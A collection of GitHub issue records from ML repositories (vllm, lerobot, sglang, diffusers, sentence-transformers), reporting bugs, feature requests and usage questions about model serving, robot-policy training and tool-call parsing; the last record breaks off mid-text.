"repo": "vllm-project/vllm", "number": 31205, "title": "ValueError: Qwen3OmniMoeThinkerForConditionalGeneration does not support LoRA yet.", "body": "\nhi, I have trained qwen3-omni thinker via ms-swift. However, when I tried to infer qwen3-omni with lora ckpt, an error occurred:\n```\nValueError: Qwen3OmniMoeThinkerForConditionalGeneration does not support LoRA yet.\n```\n\nI have tried many verions of vllm including 0.9.2, 0.11.0 and 0.12.0\n\nhere is my script:\n\n```\nCUDA_VISIBLE_DEVICES=0,1 \\\nMAX_PIXELS=1003520 \\\nswift infer \\\n --model models/omni/Qwen3-Omni/Qwen3-Omni-30B-A3B-Instruct \\\n --adapters ckpt/Qwen3-Omni/v4-20251212-163234/checkpoint-3 \\\n --merge_lora false \\\n --stream true \\\n --infer_backend vllm \\\n --val_dataset ms-swift/data/train_test.jsonl \\\n --vllm_gpu_memory_utilization 0.9 \\\n --vllm_tensor_parallel_size 2 \\\n --vllm_max_model_len 32768 \\\n --max_new_tokens 2048 \\\n --vllm_limit_mm_per_prompt '{'image': 3, 'video': 3, 'audio': 3}'\n\n```\n\n\nhow can I solved this problem? \n", "url": "https://github.com/vllm-project/vllm/issues/31205", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-23T06:52:11Z", "updated_at": "2025-12-29T14:50:37Z", "comments": 2, "user": "VJJJJJJ1" }, { "repo": "vllm-project/vllm", "number": 31204, "title": "[RFC]: Supporting Multi MTP layers in Speculative Decoding (EagleProposer)", "body": "### Motivation.\n\nThe EagleProposer for speculative decoding is only able to utilize the first MTP layer.\nHowever, the model [XiaomiMiMo/MiMo-V2-Flash](https://huggingface.co/XiaomiMiMo/MiMo-V2-Flash) has 3 MTP layers.\nIs there any plan or ongoing PR to extend support for multi MTP layers in speculative decoding?\nbtw, [hugo-wind-ding/qwq-32b-mtp](https://huggingface.co/hugo-wind-ding/qwq-32b-mtp) has 7 mtp layers for QwQ-32B\n\n### Proposed Change.\n\nEagleProposer needs a new member function to pass spec_step_idx to mtp models, when num_nextn_predict_layers > 1 and num_speculative_tokens > 1.\n\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31204", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-23T03:34:05Z", "updated_at": "2025-12-23T03:34:05Z", "comments": 0, "user": "DingYibin" }, { "repo": "huggingface/lerobot", "number": 2701, "title": "Image keys with underscores not supported when migrating to v0.4.x", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nPython 3.12.3, LeRobot versions 0.3.4 and 0.4.2\n\nFrom v0.4.2:\n lerobot version: 0.4.2\n- Platform: Linux-6.14.0-37-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n```\n\n### Description\n\nWhen upgrading a model from 0.3.4 to 0.4.2, `migrate_policy_normalization` replaces all `_` in features with `.` at https://github.com/huggingface/lerobot/blob/main/src/lerobot/processor/migrate_policy_normalization.py#L112 . I have a camera named `front_camera` used as `observations.images.front_camera`. After migrating my policy, the normalization processor expects `observations.images.front.camera`, causing https://github.com/huggingface/lerobot/blob/main/src/lerobot/processor/normalize_processor.py#L306 to fail, and my images are left unnormalized.\n\nI've hacked it by inserting `key = key.replace(\"_cam\",\".cam\")` right above the check, but this is not a good long-term fix.\n\n### Context & Reproduction\n\n1. Have a model trained under LeRobot 0.3.4 with non-identity normalizations on images, and the image keys having underscores, such as `front_camera`\n2. Check the `input_features` in `config.json`, see the underscores in the image name\n3. Migrate the model to LeRobot 0.4.2 using `migrate_policy_normalization.py`\n4. See that the underscores are preserved in the migrated `config.json`, but in the corresponding `policy_preprocessor_step__normalizer_processor.safetensors` they have been replaced with dots\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nI've inserted `key = key.replace(\"_cam\",\".cam\")` into `normalize_processor.py` in order to make the keys match what the processor is expecting.", "url": "https://github.com/huggingface/lerobot/issues/2701", "state": "open", "labels": [ "bug", "question", "policies", "sensors", "processor" ], "created_at": "2025-12-23T03:27:41Z", "updated_at": "2025-12-23T03:27:50Z", "user": "dangr" }, { "repo": "huggingface/lerobot", "number": 2700, "title": "Training an Smolvla model on the lerobot/aloha_sim_insertion_human dataset does not converge", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\nUbuntu 22.04\nlerobot 0.4.1\npython 3.10\n\nlerobot-train \\\n --job_name aloha_smolvla \\\n --output_dir $OUTPUT_DIR \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --policy.type=smolvla \\\n --policy.load_vlm_weights=true \\\n --steps=200000 \\\n --eval_freq=50000 \\\n --save_freq=50000 \\\n --dataset.repo_id=\"lerobot/aloha_sim_insertion_human\" \\\n --policy.push_to_hub=false \\\n --wandb.enable=true\n```\n\n### Description\n\nI am tring to train Smolvla model on the lerobot/aloha_sim_insertion_human dataset, but the training does not converge. In the simulation, the robotic arm trembled and got stuck at a certain position, failing to successfully pick up the object.\n\n### Context & Reproduction\n\n```bash\nlerobot-train \\\n --job_name aloha_smolvla \\\n --output_dir $OUTPUT_DIR \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --policy.type=smolvla \\\n --policy.load_vlm_weights=true \\\n --steps=200000 \\\n --eval_freq=50000 \\\n --save_freq=50000 \\\n --dataset.repo_id=\"lerobot/aloha_sim_insertion_human\" \\\n --policy.push_to_hub=false \\\n --wandb.enable=true\n\nlerobot-eval \\\n --policy.path=\"$CHECKPOINT_DIR\" \\\n --env.type=aloha \\\n --env.task=\"AlohaInsertion-v0\" \\\n --eval.n_episodes=50 \\\n --eval.batch_size=50\n```\n\nhttps://github.com/user-attachments/assets/97feea83-2f1e-45a3-9253-6dffdd13f7ea\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2700", "state": "open", "labels": [ "question", "policies", "dataset", "simulation", "robots", "training" ], "created_at": "2025-12-23T03:13:47Z", "updated_at": "2025-12-30T21:05:50Z", "user": "sslndora0612-max" }, { "repo": "vllm-project/vllm", "number": 31202, "title": "[Bug]: Mixtral Fp8 Accuracy is Degraded", "body": "### Your current environment\n\nH200\n\n### \ud83d\udc1b Describe the bug\n- launch\n```bash\nvllm serve amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV --enforce-eager -tp 2\n```\n\n- eval\n```bash\n\nlm_eval \\\n\t--model local-completions \\\n\t--tasks gsm8k \\\n\t--model_args \"model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\n- on main:\n```bash\nlocal-completions (model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.2843|\u00b1 |0.0124|\n| | |strict-match | 5|exact_match|\u2191 |0.2108|\u00b1 |0.0112|\n```\n\n- on 0.12.0:\n```bash\nlocal-completions (model=amd/Mixtral-8x7B-Instruct-v0.1-FP8-KV,base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False), gen_kwargs: (None), limit: None, num_fewshot: None, batch_size: 1\n|Tasks|Version| Filter |n-shot| Metric | |Value | |Stderr|\n|-----|------:|----------------|-----:|-----------|---|-----:|---|-----:|\n|gsm8k| 3|flexible-extract| 5|exact_match|\u2191 |0.6459|\u00b1 |0.0132|\n| | |strict-match | 5|exact_match|\u2191 |0.6452|\u00b1 |0.0132|\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31202", "state": "closed", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-23T02:27:28Z", "updated_at": "2025-12-23T02:42:58Z", "comments": 1, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31200, "title": "[Bug]: class Request and block_hasher has cirular reference, may cause memory leak.", "body": "### Your current environment\n\n Running MultiModal Network with prefix caching will cause memory leak. \n
\n\nclass Request:\n def __init__(\n ...\n self.block_hashes: list[BlockHash] = []\n self.get_hash_new_full_blocks: Callable[[], list[BlockHash]] | None = None\n if block_hasher is not None:\n self.get_hash_new_full_blocks = partial(block_hasher, self) # Request hold block_hasher and block_hasher hold Request, create a circular references.\n self.block_hashes = self.get_hash_new_full_blocks()\n\n\nCan it change to the below code? \n\n\nimport weakref\nclass Request:\n def __init__(\n ...\n self.block_hashes: list[BlockHash] = []\n self.get_hash_new_full_blocks: Callable[[], list[BlockHash]] | None = None\n if block_hasher is not None:\n self.get_hash_new_full_blocks = partial(block_hasher, weakref.proxy(self)) # Use weakref to avoid circual references.\n self.block_hashes = self.get_hash_new_full_blocks()\n\n\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nRuning a multimodal, will cause memory leak. \nBecause the following leak trace: block_hasher -> MultiModalFeatureSpec -> MultiModalKwargsItem -> MultiModalFiledElem -> image_pixels(Tensor)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31200", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T01:55:47Z", "updated_at": "2025-12-23T15:02:37Z", "comments": 1, "user": "frelam" }, { "repo": "huggingface/diffusers", "number": 12881, "title": "Is that a bug of prompt2prompt pipeline with replace word pormpt?", "body": "### Describe the bug\n\nIt performance the same when return different cross attention map, is implement error or just the problem with prompt2prompt.\n\n### Reproduction\n\nUse stable-diffusion-2-1:\n`images = pipe([\"A turtle playing with a ball\", \"A monkey playing with a ball\"],\n generator=torch.Generator(\"cuda\").manual_seed(34),\n cross_attention_kwargs={\n \"edit_type\": \"replace\",\n \"local_blend_words\": [\"turtle\", \"monkey\"],\n \"n_cross_replace\": 0.4,\n \"n_self_replace\": 0.4\n }).images`\n\nIt performance the same when return different cross attention map:\n`class AttentionReplace(AttentionControlEdit):\n def replace_cross_attention(self, attn_base, att_replace):\n return attn_base.unsqueeze(0).expand(att_replace.shape[0], *attn_base.shape)\n return torch.einsum(\"hpw,bwn->bhpn\", attn_base, self.mapper)`\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nDiffusers=0.30.0\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12881", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-23T01:55:06Z", "updated_at": "2025-12-23T01:55:06Z", "comments": 0, "user": "lincion" }, { "repo": "sgl-project/sglang", "number": 15641, "title": "[Feature] In the event_loop_overlap function of the scheduler, can the recv operation be processed asynchronously?", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nIn the _offline large-scale high-concurrency multimodal deterministic inference scenario_, when using `event_loop_overlap `on a single machine, the `recv `operation is performed **synchronously before each step**. This can cause the GPU to idle due to waiting for recv requests, **thereby reducing the utilization rate**.\nWe have implemented a version that moves the recv to a background thread for continuous request reception. We use a priority lock to ensure that incoming requests are prioritized for queueing and processing. _On a single machine with eight H100 cards_, we have achieved an **increase in utilization from 60% to 75%**.\nWe hope that sglang can provide high-quality support for large-scale offline high-concurrency scenarios with high power and high utilization requirements.\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15641", "state": "open", "labels": [], "created_at": "2025-12-22T14:04:10Z", "updated_at": "2025-12-22T14:04:10Z", "comments": 0, "user": "titanium-temu" }, { "repo": "sgl-project/sglang", "number": 15634, "title": "[Bug] sgl-kernel does not support fa3???", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [x] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nCUDA error (/sgl-kernel/build/_deps/repo-flash-attention-src/hopper/flash_fwd_launch_template.h:166): invalid configuration argument\n\n### Reproduction\n\nno_proxy=\"*\" SGLANG_TORCH_PROFILER_DIR=./ python -m sglang.launch_server --model-path /root/temp_can/DeepSeek-V3-0324 --load-format dummy --tp 4 --ep 4 --disable-cuda-graph --disable-radix-cache --moe-a2a-backend deepep --deepep-mode normal --chunked-prefill-size -1 --host 0.0.0.0 --port 30000 --enable-two-batch-overlap --attention-backend fa3\n\n### Environment\n\n(new_py310) root@zyhuang0-0:~/temp_can/sglang# python3 -m sglang.check_env\nPython: 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0]\nCUDA available: True\nGPU 0,1,2,3: NVIDIA H100 80GB HBM3\nGPU 0,1,2,3 Compute Capability: 9.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.41\nCUDA Driver Version: 550.54.15\nPyTorch: 2.9.1+cu128\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.2.6\naiohttp: 3.13.2\nfastapi: 0.127.0\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.21\npyzmq: 27.1.0\nuvicorn: 0.40.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 3.0.0\nNVIDIA Topology: \n GPU0 GPU1 GPU2 GPU3 NIC0 NIC1 NIC2 NIC3 NIC4 NIC5 NIC6 CPU Affinity NUMA Affinity GPU NUMA ID\nGPU0 X NV18 NV18 NV18 SYS PIX SYS SYS SYS SYS SYS 0-47,96-143 0 N/A\nGPU1 NV18 X NV18 NV18 SYS SYS SYS SYS SYS PIX SYS 48-95,144-191 1 N/A\nGPU2 NV18 NV18 X NV18 SYS SYS SYS SYS SYS SYS SYS 48-95,144-191 1 N/A\nGPU3 NV18 NV18 NV18 X SYS SYS SYS SYS SYS SYS PIX 48-95,144-191 1 N/A\nNIC0 SYS SYS SYS SYS X SYS SYS SYS SYS SYS SYS\nNIC1 PIX SYS SYS SYS SYS X SYS SYS SYS SYS SYS\nNIC2 SYS SYS SYS SYS SYS SYS X PXB PXB SYS SYS\nNIC3 SYS SYS SYS SYS SYS SYS PXB X PIX SYS SYS\nNIC4 SYS SYS SYS SYS SYS SYS PXB PIX X SYS SYS\nNIC5 SYS PIX SYS SYS SYS SYS SYS SYS SYS X SYS\nNIC6 SYS SYS SYS PIX SYS SYS SYS SYS SYS SYS X \n\nLegend:\n\n X = Self\n SYS = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)\n NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node\n PHB = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)\n PXB = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)\n PIX = Connection traversing at most a single PCIe bridge\n NV# = Connection traversing a bonded set of # NVLinks\n\nNIC Legend:\n\n NIC0: mlx5_0\n NIC1: mlx5_1\n NIC2: mlx5_2\n NIC3: mlx5_3\n NIC4: mlx5_4\n NIC5: mlx5_5\n NIC6: mlx5_6\n\n\nulimit soft: 1048576", "url": "https://github.com/sgl-project/sglang/issues/15634", "state": "open", "labels": [], "created_at": "2025-12-22T10:50:36Z", "updated_at": "2025-12-22T10:50:55Z", "comments": 0, "user": "ziyuhuang123" }, { "repo": "huggingface/lerobot", "number": 2697, "title": "Run pi0.5 on Libero, incorrect version of transformers", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nCopy-and-paste the text below in your GitHub issue and FILL OUT the last point.\n\n- lerobot version: 0.4.0\n- Platform: Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090\n- Using GPU in script?: \n```\n\n### Description\n\nI am running PI0.5 on Libero Benchmark and I encounter with the following issues:\n\n```python\nBuilt vec env | suite=libero_spatial | task_id=6 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=7 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=8 | n_envs=1\nBuilt vec env | suite=libero_spatial | task_id=9 | n_envs=1\nINFO 2025-12-22 03:42:33 bot_eval.py:499 Making policy.\nThe PI05 model is a direct port of the OpenPI implementation. \nThis implementation follows the original OpenPI structure for compatibility. \nOriginal implementation: https://github.com/Physical-Intelligence/openpi\n`torch_dtype` is deprecated! Use `dtype` instead!\nTraceback (most recent call last):\n File \"/home/yu/miniconda3/envs/lerobot/bin/lerobot-eval\", line 7, in \n sys.exit(main())\n File \"/home/yu/copy/vla/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 763, in main\n eval_main()\n File \"/home/yu/copy/vla/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 501, in eval_main\n policy = make_policy(\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/factory.py\", line 412, in make_policy\n policy = policy_cls.from_pretrained(**kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 893, in from_pretrained\n model = cls(config, **kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 842, in __init__\n self.model = PI05Pytorch(config)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 541, in __init__\n raise ValueError(msg) from None\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\n```\n\nCan I kindly ask is there anyone encounter with similar issues?\n", "url": "https://github.com/huggingface/lerobot/issues/2697", "state": "open", "labels": [ "bug", "question", "evaluation" ], "created_at": "2025-12-22T08:54:56Z", "updated_at": "2025-12-22T16:20:01Z", "user": "yqi19" }, { "repo": "huggingface/lerobot", "number": 2696, "title": "RTC does not work.", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- lerobot version: 0.4.3\n- Platform: Linux-5.10.134-17.3.al8.x86_64-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA H20\n- Using GPU in script?: \n```\n\n### Description\n\nI trained pi05 using my own dataset (where the actions are absolute joint angles). The final training loss reached 0.006.\n\nThen I ran examples/rtc/eval_dataset.py.\n`rtc=RTCConfig(enabled=True, prefix_attention_schedule=, max_guidance_weight=100.0, execution_horizon=8, debug=True, debug_maxlen=1000), device='cuda:0', output_dir='rtc_debug_output', seed=42, inference_delay=4, use_torch_compile=False, torch_compile_backend='inductor', torch_compile_mode='default', torch_compile_disable_cudagraphs=True)`\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\nHowever, when I run the same script with the following parameters:\n`\npython examples/rtc/eval_dataset.py \\\n --policy.path=lerobot/pi05_libero_finetuned \\\n --dataset.repo_id=HuggingFaceVLA/libero \\\n --rtc.execution_horizon=8 \\\n --device=cuda\n`\neverything works fine. I would like to know where the error might be occurring.\n\n### Context & Reproduction\n\nThe training parameters are as follows:\n` \"args\": [\n \"--dataset.repo_id=/mnt/model/wlz/real_stack_purple_toy_joint_lerobot\",\n \"--policy.type=pi05\",\n \"--output_dir=./outputs/pi05_training\",\n \"--job_name=pi05_training\",\n \"--policy.repo_id=wlz\",\n \"--policy.pretrained_path=lerobot/pi05_base\",\n \"--policy.compile_model=true\",\n \"--policy.gradient_checkpointing=true\",\n \"--wandb.enable=false\",\n \"--policy.dtype=bfloat16\",\n \"--steps=5000\",\n \"--policy.device=cuda\",\n \"--batch_size=32\",\n \"--policy.input_features={\\\"observation.images.image\\\":{\\\"shape\\\":[3,256,256],\\\"type\\\":\\\"VISUAL\\\"},\\\"observation.images.image2\\\":{\\\"shape\\\":[3,256,256],\\\"type\\\":\\\"VISUAL\\\"},\\\"observation.state\\\":{\\\"shape\\\":[7],\\\"type\\\":\\\"STATE\\\"}}\",\n \"--policy.output_features={\\\"action\\\":{\\\"shape\\\":[7],\\\"type\\\":\\\"ACTION\\\"}}\"\n ]\n`\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2696", "state": "closed", "labels": [ "bug", "question", "policies", "dataset", "CI", "python", "examples", "training" ], "created_at": "2025-12-22T03:22:23Z", "updated_at": "2025-12-22T05:20:39Z", "user": "xiaozhisky1" }, { "repo": "huggingface/sentence-transformers", "number": 3601, "title": "how to finetuning a bi-encoder embedding model of multimodel input", "body": "I want to cluster ecommerce products by bi-encoder. For each product, it has a name(text) and an image. Can I use sentence-transfomer to finetune a bi-encoder model? The training dataset contains product clusters, like:\n\n```\nproduct1_name, product1_img, cluster_id1\nproduct2_name, product2_img, cluster_id1\nproduct3_name, product3_img, cluster_id2\n\nproductm_name,productm_img, cluster_idn\n```\n\nI want to try first to define it as a classification problem(cluster_id1,...cluster_idn) and use arcface loss. But If there are other suitable losses, it's also fine.\n\n Is sentence transformer suitable for my use case? I find siglip(something like clip) is good at embedding. Its training data is image/text pair, but my data is not the same as it.\n", "url": "https://github.com/huggingface/sentence-transformers/issues/3601", "state": "open", "labels": [], "created_at": "2025-12-22T02:46:43Z", "updated_at": "2025-12-22T09:09:31Z", "user": "fancyerii" }, { "repo": "vllm-project/vllm", "number": 31096, "title": "[Usage]: Qwen3-Next: Both Instruct and Thinking models don't support function calling", "body": "\nDoes the Qwen3-Next model not support the function calling feature? Test results show some common error scenarios:\n1. The tools should be called, but content returned something like the following:\n```\n{\n \"choices\": [\n {\n \"message\": {\n \"content\": \"
\\n{\\\"name\\\": \\\"send_email\\\", \\\"arguments\\\": {\\\"userInput\\\": \\\"ALAN\u7684ID\u662f123456\uff0cALAN\uff0c\u4e2d\u56fd\u4eba\uff0c\u82f1\u8bed\u6570\u5b66\u5f88\u725b\\\"}}\\n\",\n \"tool_calls\": []\n },\n \"finish_reason\": \"stop\"\n }\n ]\n}\n```\n```\n{\n \"id\": \"chatcmpl-38af97847cce417a84577fe604d5b31e\",\n \"object\": \"chat.completion\",\n \"created\": 1766119733,\n \"model\": \"Next\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\\n{\\\"name\\\": \\\"get_weather\\\", \\\"arguments\\\": {\\\"location\\\": \\\"San Francisco\\\", \\\"unit\\\": \\\"celsius\\\"}}\\n\",\n \"refusal\": null,\n \"annotations\": null,\n \"audio\": null,\n \"function_call\": null,\n \"tool_calls\": [],\n \"reasoning_content\": null\n },\n \"logprobs\": null,\n \"finish_reason\": \"stop\",\n \"stop_reason\": null,\n \"token_ids\": null\n }\n ],\n \"service_tier\": null,\n \"system_fingerprint\": null,\n \"usage\": {\n \"prompt_tokens\": 619,\n \"total_tokens\": 647,\n \"completion_tokens\": 28,\n \"prompt_tokens_details\": null\n },\n \"prompt_logprobs\": null,\n \"prompt_token_ids\": null,\n \"kv_transfer_params\": null\n}\n```\n2. Returning to the contents of the parameter list may result in non-standard characters, causing parameter retrieval to fail.\n```\n{\n \"choices\": [\n {\n \"message\": {\n \"content\": \"\",\n \"tool_calls\": [\n {\n \"id\": \"chatcmpl-tool-ad840dff072841759d3ed8a26e21391f\",\n \"type\": \"function\",\n \"index\": 0,\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"\"\n }\n }\n ]\n },\n \"finish_reason\": \"tool_calls\"\n }\n ]\n}\n```\n\n\n", "url": "https://github.com/vllm-project/vllm/issues/31096", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-21T12:02:08Z", "updated_at": "2025-12-23T03:02:02Z", "comments": 0, "user": "PHOEBEMOON0802" }, { "repo": "huggingface/lerobot", "number": 2694, "title": "The GT00T algorithm simply won't run and throws the following error. Could someone please help me fix it?", "body": "The GT00T algorithm simply won't run and throws the following error. Could someone please help me fix it?\n\nn_model.post_layernorm.bias', 'backbone.eagle_model.vision_model.vision_model.post_layernorm.weight']\nTraceback (most recent call last):\n File \"/home/ruijia/miniconda3/envs/lerobot/bin/lerobot-train\", line 7, in \n sys.exit(main())\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/scripts/lerobot_train.py\", line 517, in main\n train()\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/scripts/lerobot_train.py\", line 268, in train\n preprocessor, postprocessor = make_pre_post_processors(\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/policies/factory.py\", line 252, in make_pre_post_processors\n PolicyProcessorPipeline.from_pretrained(\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 567, in from_pretrained\n loaded_config, base_path = cls._load_config(model_id, config_filename, hub_download_kwargs)\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 638, in _load_config\n cls._suggest_processor_migration(model_id, f\"Config file '{config_filename}' not found\")\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 1212, in _suggest_processor_migration\n raise ProcessorMigrationError(model_path, migration_command, original_error)\nlerobot.processor.pipeline.ProcessorMigrationError: Model '/home/ruijia/llmweights/GR00T-N1.5-3B' requires migration to processor format. Run: python src/lerobot/processor/migrate_policy_normalization.py --pretrained-path /home/ruijia/llmweights/GR00T-N1.5-3B\n\nOriginal error: Config file 'policy_preprocessor.json' not found\n@kashif @ozten @jpizarrom @julien-c @jbcayrou ", "url": "https://github.com/huggingface/lerobot/issues/2694", "state": "open", "labels": [ "bug", "question", "policies", "CI", "python", "processor", "examples", "training" ], "created_at": "2025-12-21T09:12:14Z", "updated_at": "2025-12-24T00:06:08Z", "user": "wuxiaolianggit" }, { "repo": "huggingface/lerobot", "number": 2693, "title": "Wrist Roll motor not responding", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nlerobot version 0.4.0\n```\n\n### Description\n\nI connected to the lerobot so101 bot ->setup motors->callibrated->tested teleoperation\n,everything wewnt fine .But after few hours when recallibration is done in some other system the wrist roll motor of the follower arm went partially stiff and it is not responding . [Used FT SCServo Debugger]\n\n\"Image\"\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2693", "state": "open", "labels": [ "bug", "question", "teleoperators" ], "created_at": "2025-12-21T09:01:51Z", "updated_at": "2025-12-26T10:19:17Z", "user": "CHIRANJEET1729DAS" }, { "repo": "huggingface/lerobot", "number": 2692, "title": "[Bug] Too many errors when Train RL in Simulation", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n`\n- LeRobot version: 0.4.3\n- Platform: Linux-6.8.0-90-generic-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 